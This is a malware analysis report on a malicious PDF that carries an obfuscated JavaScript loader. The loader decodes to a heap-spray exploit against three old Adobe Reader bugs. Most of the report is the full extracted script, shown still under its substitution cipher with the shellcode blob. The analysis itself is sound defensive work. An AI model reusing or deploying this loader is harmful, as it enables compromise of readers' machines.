Malicious PDF — malware analysis report

Static analysis result for SHA-256 1e84f1c9bd91d6f7…

Verdict: MALICIOUS
File type: PDF
Size: 9.3 KB
Created: 2010-05-19 22:42:12
Authoring application: XQFgAP5H7nA4Hr (via pAh5TeNWKmGloR)
First seen: 2026-05-10
MD5: 234214746c8d9a55e9d4562af4952e6e
SHA-1: b9f8eeb3e1dcd6fa489bbda4a8c18f8278be29a2
SHA-256: 1e84f1c9bd91d6f736453eeb1ad1d8724f1887679af144607affa0937dc28a55
Risk score: 166

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell (platform-assigned; nothing in the extracted script invokes PowerShell. The behaviour visible in the decoded script is JavaScript execution inside the PDF reader, T1059.007, and exploitation of the reader itself, T1203 Exploitation for Client Execution.)

The PDF carries an embedded JavaScript stream (PDF_JAVASCRIPT, PDF_JS); the critical PDF_JS_EXPLOIT_CLUSTER finding fires because that stream pairs an eval() sink with unescape()-style payload staging. The extracted script is a two-layer loader: two 71-character alphabets are stored in the clear (AGri6 and upRekBB), a helper maps each character of a long string constant from one alphabet to the other, and the result is handed to eval(). Applying that table to the constant yields a version-gated Adobe Reader exploit. It reads app.viewerVersion, heap-sprays a %u-encoded shellcode string behind %u9090 NOP sleds in 0x400000-byte blocks up to a target address of 0x0c0c0c0c (0x30303030 in one branch), then triggers one of three Reader JavaScript API bugs: Collab.collectEmailInfo with an oversized msg for versions below 7.1 (CVE-2007-5659), util.printf with a "%45000f" format string for 7.1 up to 9 (CVE-2008-2992), and Collab.getIcon with an oversized argument for 9 and later (CVE-2009-0927). The sprayed shellcode opens with a standard XOR decoder stub (key 0xEF over 0x180 bytes) whose decoded payload starts by walking the PEB (mov eax, fs:[0x30]) to locate loaded modules; what it does after resolving its imports, typically fetching a second stage, is not visible from this static view. The random-looking authoring application string is typical of generated exploit documents; the 2010 creation date cannot be verified but is consistent with the age of the targeted bugs, and nothing in the script involves PowerShell.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (4)

  • PDF_JAVASCRIPT (low; 2 related findings): JavaScript action
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_JS_EXPLOIT_CLUSTER (critical): PDF JavaScript exploit cluster
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script (shown as stored in the stream, still under the substitution cipher: 0 stands for a space, %z for %u):
    0==0f5R\n0000pWLXUcuWHAw>W6Vb0=0zS9)eC(9o\"%zvQvQ%zvQvQ%zvQvQ%zM7.3%zQQI3%zZZxD%zrM3D%zrMMN%z.7QQ%z.fvQ%z.37H%z.rMI%z77.x%z7777%zr3s7%zY7v.%z.7.7%zZv.7%z.QH7%zD7Zv%zvf7Q%zD7Zv%zZ..s%z.7MQ%z.7.3%zZv.7%z3DMQ%zZNrs%z.NHN%zMsMQ%z.7NN%z.7.7%zHHZZ%z3D.3%zssrs%zZINN%zMs.N%z.7N7%z.7.7%zHHZZ%z3D.s%zxHrs%zNMI7%zMsfY%z.7MY%z.7.7%zHHZZ%z3D.Q%zMMrs%zM7fN%zMsr7%z.7Q3%z.7.7%zHHZZ%z3D77%zf.rs%zMHDZ%zMsIs%z.7fD%z.7.7%zHHZZ%zH773%zYsZ7%zDHfx%zZZNI%z7sHH%z.rMZ%z.7..%z3N.7%zDHZZ%zZvx3%z.3HH%z..rI%zZv3Z%z7s3H%zMs3D% …
  • PDF_JS (low): Embedded JS stream
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • EXTRACTED_FILE_STATIC_TRIAGE (medium): Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0007_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 7 at offset 0x237
Size: 8083 bytes
SHA-256: 0eb5b5a2e58853477441cddab122b93b259b21fa557d3165ebfd2586fa443e9e
Detection
ClamAV: No threats found (the signature scan sees only the ciphered outer layer of the script)
Obfuscation or payload: likely
The carved artifact contains one eval/decoder/string-building token, the trailing eval() that executes the decoded string. 90 of 155 identifiers look randomly generated, consistent with name-mangling obfuscation; note that the tool's quoted example ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') is a slice of the substitution alphabet constant rather than an identifier, the mangled names are of the form ANpgZDl4KCedef and LtFt5thGWDFJ. The /*...*/ comments filled with random text between tokens are junk padding, not code.
Preview of extracted script
First 1,000 lines of the extracted script (the script is a single long line; the preview wraps it, and the \n sequences inside the string constant are JavaScript escapes, not line breaks)
function ANpgZDl4KCedef(ANpgZDl4KCedef,u996f8Knq6B) {var tBRQrE=ANpgZDl4KCedef. substr (u996f8Knq6B, 1);return tBRQrE;}/*h4o1OGjThQUf5fGS|s8FIjfOSggjOlRw|AovDNEldZGZ5M*/function LtFt5thGWDFJ(FABvmVNVA4z) {/*i5qoEQJSiqzI4aar|XVsaiwCCMJcHVJpR0UVG|opJdxE4Ow1lH*/var AGri6 = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*CpWEsiNKpjUV1K[MRJ16TUuYO8KGkR]m7Brpk50PfKlWVR*//*maajuvTI9SSF2k|fhwNNWJDmoONAjfkM|AvqvFyvXH1QrmwPZ9dw*/var upRekBB /*hYwvmxV[XiDYTtK]i5wpwDXZzmy*/= new String(" ko5R10q<H3xY.7i{hLtnEaVbB2PTwJymG>C6ec9Fd4WU}8ASl(jX)OzKpgu,MNfQvIZsrD");/*Gk7n9uYmiut6SxVmhf|FayvN|Imrvbg1CeeBP3oyoYu6*/for(YEwif2ihnL21h2vX=0;YEwif2ihnL21h2vX<AGri6.length;YEwif2ihnL21h2vX++) {if(FABvmVNVA4z == ANpgZDl4KCedef(upRekBB, YEwif2ihnL21h2vX)) {/*GjtllyBa[PTs2BdTiUWCyYS]CGWa1Sm72VjeJk5t*/return ANpgZDl4KCedef(AGri6, YEwif2ihnL21h2vX);/*ObsP4BxOX0DvJvyQHO <a0GTLpy]PtEF8gxOaz*/}}return FABvmVNVA4z;}/*pN3t9[fxTmB]D2hXEMLZc5ei*//*AWIbMKHZE0YHVMa8O1C|YZKlkk|fElZE*/var Ux47pImLhp = new String;var b0z6TUbrEbrA7pLlW = new String("\nKCX0XO2nNrfILKQ4Iifr0=0S9p0HXXCuo5;\nKCX0tdK3aiUT(zb>Sh7M;\nFzSeOWlS064wxly{r2tlyCjc2oL>czjEaFiA7vZwY{<0yWwN78DdZgYdSXrt5R\n00p4W890oL>czjEaFiA7vZwY{q89SdO40*0f0 
0yWwN78DdZgYdSXrt5R\n0000L>czjEaFiA7vZwY{0+=0L>czjEaFiA7vZwY{;\n001\n00L>czjEaFiA7vZwY{0=0L>czjEaFiA7vZwY{q)z6)OXWSdoM<0yWwN78DdZgYdSXrt0/0f5;\n00X9OzXS0L>czjEaFiA7vZwY{;\n1\nFzSeOWlS0w}.{r6paVx2TdF8)oU7OeffLrumlAVKs(5R\n00KCX0XtsSpv3n7c(phC(d0=0MgMeMeMeMe;\n00KCX0pWLXUcuWHAw>W6Vb0=0zS9)eC(9o\"%zvQvQ%zvQvQ%zvQvQ%zM7.3%zQQI3%zZZxD%zrM3D%zrMMN%z.7QQ%z.fvQ%z.37H%z.rMI%z77.x%z7777%zr3s7%zY7v.%z.7.7%zZv.7%z.QH7%zD7Zv%zvf7Q%zD7Zv%zZ..s%z.7MQ%z.7.3%zZv.7%z3DMQ%zZNrs%z.NHN%zMsMQ%z.7NN%z.7.7%zHHZZ%z3D.3%zssrs%zZINN%zMs.N%z.7N7%z.7.7%zHHZZ%z3D.s%zxHrs%zNMI7%zMsfY%z.7MY%z.7.7%zHHZZ%z3D.Q%zMMrs%zM7fN%zMsr7%z.7Q3%z.7.7%zHHZZ%z3D77%zf.rs%zMHDZ%zMsIs%z.7fD%z.7.7%zHHZZ%zH773%zYsZ7%zDHfx%zZZNI%z7sHH%z.rMZ%z.7..%z3N.7%zDHZZ%zZvx3%z.3HH%z..rI%zZv3Z%z7s3H%zMs3D%z.7Zv%z.7.7%zrs37%z7IYD%zD7xM%zsrMs%z.7.7%zZZ.7%z7QHH%zfHZv%zf7Zx%zZZ37%zx7HH%zNMrs%z.7.7%z37.7%zHHZv%zrI73%z3Z.Y%z3HZv%zMs7s%z.7r.%z.7.7%zHH.x%zfrx7%z3Q.7%zxNDN%zfrrH%z.3H7%zrHDs%z.7.7%zDHNM%zZvx7%z.QHH%z..rI%zZv3Z%z7s3H%zH7Ms%z.7.7%zrI.7%z3s.r%zHH.x%zYxx3%z3xQv%zNM3x%zx7DH%z3x37%zHHZv%zrI7Q%z3Z.H%z3HZv%zMs7s%z.7xx%z.7.7%z.7rI%zDHNM%zZvx7%z.sHH%z.YrI%zZv3Z%z7s3H%z77Ms%z.7.7%zrI.7%zZvNM%z77HH%z..rI%zZv3Z%z7s3H%z.7Ms%z.7.7%zH..7%z3Y3v%zM..x%zM..x%zM..x%zM..x%zMQZx%z3I.3%zZv3x%zMYQI%z3YNr%zM7NM%zZv3H%zZvMQ%z.sDf%z3fZv%z3D.Q%zDxZv%zZvYQ%z7ND3%z.xDs%z3DNx%zDDZv%z.xx7%zYxNx%zHZfZ%zvfH.%zfx.x%zYx3D%z.MND%z77IN%zNYYI%z.sD3%zfNf.%z.x.f%zH7NY%zN.Mv%zNNYv%zDH3N%z3IMH%zMvZv%z3IZv%z.xx3%zrDQf%z.QZv%zZvHv%z7Q3I%zQf.x%z.3Zv%z.xZv%z3NfH%zfY3f%z.7.s%zN3Ms%zNMNN%z3HNM%zHQ3Y%zHMHf%z.7HN%zsvZr%zsMsv%zf7QH%zZvf7%zZYQM%zQNZN%zsQZ.%zZDf.%zZZZ.%zf7Z7%zZxZf%zZsZ7%zZxf7%zZNZ7%zf.Zv%zZrsM%zQ7sM%zZvZD%zQDQY%zMMQr\"5;\n00WF0oU7OeffLrumlAVKs(0==0N5R\n0000XtsSpv3n7c(phC(d0=0MgQMQMQMQM;\n0000pWLXUcuWHAw>W6Vb0=0zS9)eC(9o\"%zvQvQ%zvQvQ%zvQvQ%zM7.3%zQQI3%zZZxD%zrM3D%zrMMN%z.7QQ%z.fvQ%z.37H%z.rMI%z77.x%z7777%zr3s7%zY7v.%z.7.7%zZv.7%z.QH7%zD7Zv%zvf7Q%zD7Zv%zZ..s%z.7MQ%z.7.3%zZv.7%z3DMQ%zZNrs%z.NHN%zMsMQ%z.7NN%z.7.7%zHHZZ%z3D.3%zssrs%zZINN%zMs.N%z.7N7%z.7.7%zHHZZ%z
3D.s%zxHrs%zNMI7%zMsfY%z.7MY%z.7.7%zHHZZ%z3D.Q%zMMrs%zM7fN%zMsr7%z.7Q3%z.7.7%zHHZZ%z3D77%zf.rs%zMHDZ%zMsIs%z.7fD%z.7.7%zHHZZ%zH773%zYsZ7%zDHfx%zZZNI%z7sHH%z.rMZ%z.7..%z3N.7%zDHZZ%zZvx3%z.3HH%z..rI%zZv3Z%z7s3H%zMs3D%z.7Zv%z.7.7%zrs37%z7IYD%zD7xM%zsrMs%z.7.7%zZZ.7%z7QHH%zfHZv%zf7Zx%zZZ37%zx7HH%zNMrs%z.7.7%z37.7%zHHZv%zrI73%z3Z.Y%z3HZv%zMs7s%z.7r.%z.7.7%zHH.x%zfrx7%z3Q.7%zxNDN%zfrrH%z.3H7%zrHDs%z.7.7%zDHNM%zZvx7%z.QHH%z..rI%zZv3Z%z7s3H%zH7Ms%z.7.7%zrI.7%z3s.r%zHH.x%zYxx3%z3xQv%zNM3x%zx7DH%z3x37%zHHZv%zrI7Q%z3Z.H%z3HZv%zMs7s%z.7xx%z.7.7%z.7rI%zDHNM%zZvx7%z.sHH%z.YrI%zZv3Z%z7s3H%z77Ms%z.7.7%zrI.7%zZvNM%z77HH%z..rI%zZv3Z%z7s3H%z.7Ms%z.7.7%zH..7%z3Y3v%zM..x%zM..x%zM..x%zM..x%zMQZx%z3I.3%zZv3x%zMYQI%z3YNr%zM7NM%zZv3H%zZvMQ%z.sDf%z3fZv%z3D.Q%zDxZv%zZvYQ%z7ND3%z.xDs%z3DNx%zDDZv%z.xx7%zYxNx%zHZfZ%zvfH.%zfx.x%zYx3D%z.MND%z77IN%zNYYI%z.sD3%zfNf.%z.x.f%zH7NY%zN.Mv%zNNYv%zDH3N%z3IMH%zMvZv%z3IZv%z.xx3%zrDQf%z.QZv%zZvHv%z7Q3I%zQf.x%z.3Zv%z.xZv%z3NfH%zfY3f%z.7.s%zN3Ms%zNMNN%z3HNM%zHQ3Y%zHMHf%z.7HN%zsvZr%zsMsv%zf7QH%zZvf7%zZYQM%zQNZN%zsQZ.%zZDf.%zZZZ.%zf7Z7%zZxZf%zZsZ7%zZxf7%zZNZ7%zf.Zv%zZrsM%zQ7sM%zZvZD%zQDQY%zMMQr\"5;\n001\n0098)90WF0oU7OeffLrumlAVKs(0==0f5R\n0000pWLXUcuWHAw>W6Vb0=0zS9)eC(9o\"%zvQvQ%zvQvQ%zvQvQ%zM7.3%zQQI3%zZZxD%zrM3D%zrMMN%z.7QQ%z.fvQ%z.37H%z.rMI%z77.x%z7777%zr3s7%zY7v.%z.7.7%zZv.7%z.QH7%zD7Zv%zvf7Q%zD7Zv%zZ..s%z.7MQ%z.7.3%zZv.7%z3DMQ%zZNrs%z.NHN%zMsMQ%z.7NN%z.7.7%zHHZZ%z3D.3%zssrs%zZINN%zMs.N%z.7N7%z.7.7%zHHZZ%z3D.s%zxHrs%zNMI7%zMsfY%z.7MY%z.7.7%zHHZZ%z3D.Q%zMMrs%zM7fN%zMsr7%z.7Q3%z.7.7%zHHZZ%z3D77%zf.rs%zMHDZ%zMsIs%z.7fD%z.7.7%zHHZZ%zH773%zYsZ7%zDHfx%zZZNI%z7sHH%z.rMZ%z.7..%z3N.7%zDHZZ%zZvx3%z.3HH%z..rI%zZv3Z%z7s3H%zMs3D%z.7Zv%z.7.7%zrs37%z7IYD%zD7xM%zsrMs%z.7.7%zZZ.7%z7QHH%zfHZv%zf7Zx%zZZ37%zx7HH%zNMrs%z.7.7%z37.7%zHHZv%zrI73%z3Z.Y%z3HZv%zMs7s%z.7r.%z.7.7%zHH.x%zfrx7%z3Q.7%zxNDN%zfrrH%z.3H7%zrHDs%z.7.7%zDHNM%zZvx7%z.QHH%z..rI%zZv3Z%z7s3H%zH7Ms%z.7.7%zrI.7%z3s.r%zHH.x%zYxx3%z3xQv%zNM3x%zx7DH%z3x37%zHHZv%zrI7Q%z3Z.H%z3HZv%zMs7s%z.7xx%z.7.7%z.7rI%zDHNM%zZvx7%z.sHH%
z.YrI%zZv3Z%z7s3H%z77Ms%z.7.7%zrI.7%zZvNM%z77HH%z..rI%zZv3Z%z7s3H%z.7Ms%z.7.7%zH..7%z3Y3v%zM..x%zM..x%zM..x%zM..x%zMQZx%z3I.3%zZv3x%zMYQI%z3YNr%zM7NM%zZv3H%zZvMQ%z.sDf%z3fZv%z3D.Q%zDxZv%zZvYQ%z7ND3%z.xDs%z3DNx%zDDZv%z.xx7%zYxNx%zHZfZ%zvfH.%zfx.x%zYx3D%z.MND%z77IN%zNYYI%z.sD3%zfNf.%z.x.f%zH7NY%zN.Mv%zNNYv%zDH3N%z3IMH%zMvZv%z3IZv%z.xx3%zrDQf%z.QZv%zZvHv%z7Q3I%zQf.x%z.3Zv%z.xZv%z3NfH%zfY3f%z.7.s%zN3Ms%zNMNN%z3HNM%zHQ3Y%zHMHf%z.7HN%zsvZr%zsMsv%zf7QH%zZvf7%zZYQM%zQNZN%zsQZ.%zZDf.%zZZZ.%zf7Z7%zZxZf%zZsZ7%zZxf7%zZNZ7%zf.Zv%zZrsM%zQ7sM%zZvZD%zQDQY%zMMQr\"5;\n001\n00KCX0VJY)GbYSQQ}ne>QP0=0MgvMMMMM;\n00KCX0WEtfNL}Hs7}(jM.A0=0pWLXUcuWHAw>W6Vbq89SdO40*0f;\n00KCX0yWwN78DdZgYdSXrt0=0VJY)GbYSQQ}ne>QP0-0oWEtfNL}Hs7}(jM.A0+0MgQr5;\n00KCX0L>czjEaFiA7vZwY{0=0zS9)eC(9o\"%zDMDM%zDMDM\"5;\n00L>czjEaFiA7vZwY{0=064wxly{r2tlyCjc2oL>czjEaFiA7vZwY{<0yWwN78DdZgYdSXrt5;\n00KCX0WP9YXXfzz87mth,e0=0oXtsSpv3n7c(phC(d0-0MgvMMMMM50/0VJY)GbYSQQ}ne>QP;\n00FlX0oKCX0at99cV(}9C>wUSia0=0M;0at99cV(}9C>wUSia0 0WP9YXXfzz87mth,e;0at99cV(}9C>wUSia0++05R\n0000XO2nNrfILKQ4Iifr[at99cV(}9C>wUSia]0=0L>czjEaFiA7vZwY{0+0pWLXUcuWHAw>W6Vb;\n001\n1\nFzSeOWlS0eK6rAef4a{.W>.n.o5R\n00KCX0A,OxVWpQhJmQLlb>0=0M;\n00KCX0.NdycWYf,2UGFZS.0=0C((qKW9p9XJ9X)WlSqOlPOXWSdo5;\n00C((qe89CXTWA9VzOotdK3aiUT(zb>Sh7M5;\n\n00WF0o.NdycWYf,2UGFZS.0 0sqN5R\n0000w}.{r6paVx2TdF8)oM5;\n0000KCX0hdBTbEy4)vU3)M860=0zS9)eC(9o\"%zMeMe%zMeMe\"5;\n0000p4W890ohdBTbEy4)vU3)M86q89SdO40 0vvDIf5hdBTbEy4)vU3)M860+=0hdBTbEy4)vU3)M86;\n0000O4W)0qel88C6POlX90=0xl88C6qel889eO.ACW8hSFloR\n000000)z6U0:0\"\"<0A)d0:0hdBTbEy4)vU3)M86\n00001\n00005;\n001\nWF0o.NdycWYf,2UGFZS.0k=0D5R\n0000OXu0R\nWF0oC((qcleqxl88C6qd9OhelS5R\n00000000w}.{r6paVx2TdF8)of5;\n00000000KCX0t2rlHn(MA>WP9JdU0=0zS9)eC(9o\"%MD\"5;\n00000000p4W890ot2rlHn(MA>WP9JdUq89SdO40 
0MgvMMM5t2rlHn(MA>WP9JdU0+=0t2rlHn(MA>WP9JdU;\n00000000t2rlHn(MA>WP9JdU0=0\"aq\"0+0t2rlHn(MA>WP9JdU;\nC((qcleqxl88C6qd9OhelSot2rlHn(MA>WP9JdU5;\n00000000A,OxVWpQhJmQLlb>0=0N;\n0000001\n00000098)90R\n00000000A,OxVWpQhJmQLlb>0=0N;\n0000001\n00001\n0000eCOe40o95R\n000000A,OxVWpQhJmQLlb>0=0N;\n00001\n0000WF0oA,OxVWpQhJmQLlb>0==0N5R\n000000WF0oo.NdycWYf,2UGFZS.0k=0sqN&&0.NdycWYf,2UGFZS.0 0D55R\n00000000w}.{r6paVx2TdF8)oN5;\n00000000KCX0Asx6TULnSQyFxhia0=0\"NfDDDDDDDDDDDDDDDDDD\";\n00000000FlX0o(V3z}NIm>A,.hdgw0=0M;0(V3z}NIm>A,.hdgw0 0fsZ;0(V3z}NIm>A,.hdgw0++05R\n0000000000Asx6TULnSQyFxhia0+=0\"r\";\n000000001\n00000000zOW8q(XWSOFo\"%vIMMMF\"<0Asx6TULnSQyFxhia5;\n0000001\n00001\n001\n1\nC((q3HsiOb64PDE9BcfH0=0eK6rAef4a{.W>.n.;\ntdK3aiUT(zb>Sh7M0=0C((q)9OTWA9VzOo\"C((q3HsiOb64PDE9BcfHo5\"<0NM5;\n");/*hgKsnjxe840KUyYL0fkP{L0QOVU0vZzS59Bj}yDis3sDsHOinyy*//*ApjPA3FwS|EO4Gxe51Couvrc25Bgu|zugY9gSFTlAXz5enZZ*/for(mqcalZ=0;mqcalZ<b0z6TUbrEbrA7pLlW.length;mqcalZ++)Ux47pImLhp += LtFt5thGWDFJ(ANpgZDl4KCedef(b0z6TUbrEbrA7pLlW,mqcalZ));eval(Ux47pImLhp);/*cDPNusGqumbl[LH0LoIR7tSVj]zNnPsFS7*/